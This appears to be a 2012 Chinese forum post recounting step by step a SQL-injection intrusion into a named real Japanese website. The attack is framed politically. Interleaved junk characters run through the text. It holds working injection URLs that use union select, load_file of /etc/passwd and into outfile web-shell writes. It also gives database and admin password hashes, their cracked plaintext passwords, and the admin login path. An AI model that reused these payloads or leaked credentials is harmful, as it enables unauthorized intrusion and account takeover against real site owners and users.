找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3447|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

% B# S' ], D" l, a& t# |: J. G) }2 S3 ^1 n! d, D
0x01. 检测 www.zuaa.jp 收集数据4 ^8 k. d, K7 J% @" U7 |6 x/ o
9 k( @- P  \. _% j
. ?0 `3 e$ X8 Z. Z6 c1 _( }1 |7 O
whatweb5 |1 f; G* D5 c
1 Q; L" B9 C3 v0 T' u! X% m7 Z

1 q* y% s; [% f  f利用NMAP扫描3 n' j# W2 ~: J! J

0 \6 n0 h5 H: _3 Y. M9 H( z3 K5 {6 R中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持. l9 X: s; a% u/ P
0x02.找注入点. \9 u: G# ]' g* }/ D) @
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
0 {8 S4 b5 e) |: J" s5 T8 R) V. d& v8 P; ^  {4 Q. m

8 b- l. z+ }/ o0x03.order by, e7 D- X4 o, \+ C5 [
             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 16 E8 G4 j5 w5 q6 w  _0 y

+ P; Q% Y1 ~( G% e' [: horder by 28报错,order by 27正常5 G7 r: F) b  E( l1 A0 U, N' a& X
5 H1 M5 r% p5 X4 k, G6 m
0x04.   union手动查询; ~, c- C' t/ o% @8 N3 q
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
4 M- L  g/ [7 G* y. o添加到 27 时正常显示 $ G6 `1 h' ~+ |. y. j- M& B, R2 l. h

3 s- a$ h3 o: `中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
; W- p4 N% @! I1 j/ w0 p4 B& n
0x05. info:- M' `# V& ~6 F- V* ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
! {2 W" r; {: E. ~7 R) {( V6 n5 g1 k; i
user:            root@localhost
0 j% i4 W6 {9 U8 idatabase:    openpne
; B& \2 @: d$ \; ~version:      4.1.220 J- N3 E2 R: v0 N; ~
os:             portbld-freebsd5.4) m; Z7 R. ~# E( R

, g! {0 P( X: W  e! @$ N0x06. root用户7 Y, }7 b; w- `6 z) X
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)* d5 g7 d3 A& t& S
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 9 i6 t3 p0 g3 I7 I: z
3 J$ s1 E" g9 N6 s, v) K
通过工具转换, _* k: l, ]7 ?$ P5 C6 O1 \

8 ~4 t' m- e/ b4 L中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
4 i" V+ n9 o  C: h0 ^+ U1 S
- ?2 d$ q+ r% ~7 I* i6 |0x07. 利用 into outfile4 r7 e: z" z' q, l& ]  V/ R5 @9 z( Y
全部都失败
+ z1 c+ ^, r- Hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php  M4 K, X" j) I+ r" w3 D8 r

9 {; F, F+ G7 `4 O. Uhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
: @7 I' r- d: Y  `  o- S
4 ^/ F, o' ~8 u  {$ i% G页面显示“MDB2 Error:syntax error”
6 y% U3 {- a" ^: ~$ v3 h( n2 p5 `( x/ V2 c/ U
0x08. 利用 mysql 4.1/ F7 c  a1 A+ C" j' A, C
猜常规表名,字段未果 工具 sqlmap
! l: M3 [/ t8 V6 `  ?& J1 W0 ^中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
  y; B5 y; u$ k# P& D' K$ H4 [6 V& Q" K1 _, C( Q( s4 b
+ w1 a  j% b  L  L, Q
; d; l) ^$ T6 D
0x09. 查找后台2 T7 L( d# {3 l3 H  n# H" g3 g
利用 现有的各种 后台工具尝试都不行
! W! P! J/ Q+ r2 t. {% g) T1 t& D$ a+ @+ R. a' N+ @; n, o+ [
0x10.  MySL外联方法
( T/ v% Z+ R% n! r6 e  b从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
+ l4 I% t$ B+ |8 d$ g* p9 o4 B+ D( f可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user. l7 }; u) I, b( {7 b4 P
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user$ M- S+ x' c3 e2 f: i; r

* C# g/ f1 b4 N7 m5 [# ]这个可以在 www.cmd5.com 解密
! H& p/ R& I9 g) D: L0 P& t+ Eroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009+ |9 f9 A5 j# Y4 g
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
: K4 e3 B' K+ O; O% v" P+ ~openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
' w- K( k! y# j6 g' v  R6 r  U; Kzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
/ k9 x' _. n/ A7 Y工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知" U3 [$ e$ `4 {0 a

6 h8 o. Q: ?& J9 }8 f! C1 P/ e3 ^, I: u5 b) P' r- g
0x11. 网站突破
( }+ L+ f5 {! f+ w* i% p发现网站的源程序 openpne, google 下载 openpne 源码
3 M& T2 V4 }! k$ l7 }5 b/ K5 C# T6 c0 w2 b6 f8 B- E+ A# i

+ K9 K2 U! a1 O4 f3 r6 K+ V. s0x12. 默认信息利用
7 g: Q9 f& i" d0 rhttp://sns.zuaa.jp/?m=admin&a=page_login
$ P* N) S$ g' |. A/ V' m
5 o0 A1 `( v' G% H- u8 ]表名 (c_admin_user) ,字段名(username,password)
1 N2 x1 G# X$ R3 \5 `5 t  N5 hhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user  N* l) D5 F8 H* A& m* D

! E- h; v9 y" E. w, Z) Q& j4 ]解密; F) s( d0 o1 D; M0 [
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009% |0 Z: o, [1 C) z9 K7 H
zuaajp:c0923ec5857796a393da99905008c176,          zju18978 M* u' F" ^4 o& F, n1 F
) O1 [. m5 E! W6 Q8 r
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持8 w9 L/ L1 F' ]* Y

3 w2 _6 t8 P6 `# Y) V5 [0x13. 登录后台! T! ~+ A' }8 b; z

  J5 ~, U5 H) f$ g/ L! ]6 E$ U; ?- I7 A% g% I
3 q; S" Q" x0 `+ m1 X- Z" s- m
0x14. 小结) \. H7 J% X( P  D8 I
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
2 i* N9 P5 ^% P感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
' t1 a8 ~7 y  U# F# e! B2 n  X. o3 Y+ t------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
/ \0 u3 M2 K* O中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持$ w2 }4 D6 p$ ?: }, D( s% C' L
' |; D$ G+ a5 ]- g( |  a, |) H
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
6 U2 I' W: j" N# _: _9 F0 m

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表